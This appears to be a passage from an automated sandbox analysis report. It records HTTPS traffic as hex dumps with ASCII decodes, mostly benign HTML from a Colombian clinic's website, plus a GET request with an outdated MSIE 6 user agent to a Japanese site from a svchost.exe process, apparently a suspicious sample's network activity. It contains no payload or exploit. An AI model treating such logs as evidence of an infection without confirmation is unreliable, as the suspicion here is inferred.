                                                                                                                                                                                                                                                  Data Ascii: ndex.php/nuestra-clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactive g-fade g-dro
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1663INData Raw: 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72
                                                                                                                                                                                                                                                  Data Ascii: -type-component g-menu-item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y pr
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1665INData Raw: 2d 74 69 74 6c 65 22 3e 53 49 43 4f 46 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65
                                                                                                                                                                                                                                                  Data Ascii: -title">SICOF</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1666INData Raw: 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 63 72 c3 ad 62 65 6e 6f 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d
                                                                                                                                                                                                                                                  Data Ascii: "g-menu-item-title">Escrbenos</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1667INData Raw: 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f
                                                                                                                                                                                                                                                  Data Ascii: -menu-item g-menu-item-type-component g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1669INData Raw: 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 74 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63
                                                                                                                                                                                                                                                  Data Ascii: </div><div class="platform-content"><div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafanc
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1670INData Raw: 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 6f 70 65 6e 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70
                                                                                                                                                                                                                                                  Data Ascii: or none openSpeed : 250, closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tp
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1671INData Raw: 6f 6e 65 22 3b 09 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 73 74 75 66 66 28 62 6f 78 69 64 29 7b 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63
                                                                                                                                                                                                                                                  Data Ascii: one";}function hidestuff(boxid){ document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-c
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1673INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 22
                                                                                                                                                                                                                                                  Data Ascii: <div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-button"
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1674INData Raw: 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                  Data Ascii: ketlauncher/home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1675INData Raw: 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c
                                                                                                                                                                                                                                                  Data Ascii: ""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> <
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1677INData Raw: 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69
                                                                                                                                                                                                                                                  Data Ascii: figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><i
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1678INData Raw: 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f
                                                                                                                                                                                                                                                  Data Ascii: s="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1679INData Raw: 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 43 6f 6e 73 75 6c 74 61 20 45 78 74 65 72 6e 61 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 33 2d 20 4f 70 63 69 c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72
                                                                                                                                                                                                                                                  Data Ascii: ><br></br><strong>Citas Consulta Externa: <p>6076430023- Opcin 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Pr
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1681INData Raw: 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 20 67 2d 63 6f 6e 74 61 63 74 2d 63 6f 6d 70 61 63 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c
                                                                                                                                                                                                                                                  Data Ascii: ass="g-contact g-contact-compact"><div class="g-contact-item"><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1682INData Raw: 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 70 79 72 69 67 68 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d
                                                                                                                                                                                                                                                  Data Ascii: /div></div></div></section><section id="g-copyright"><div class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title="" rel="home" class="g-footer-logo"><im
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1683INData Raw: 34 66 65 0d 0a 74 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73
                                                                                                                                                                                                                                                  Data Ascii: 4fet"></span></a></div></div></div></div></div></section></div><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></s
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1685INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  26192.168.2.45964149.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:06 UTC1733OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: nts-web.net
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1925INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:06 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 2599149
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                  ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1926INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC1941INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                  Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
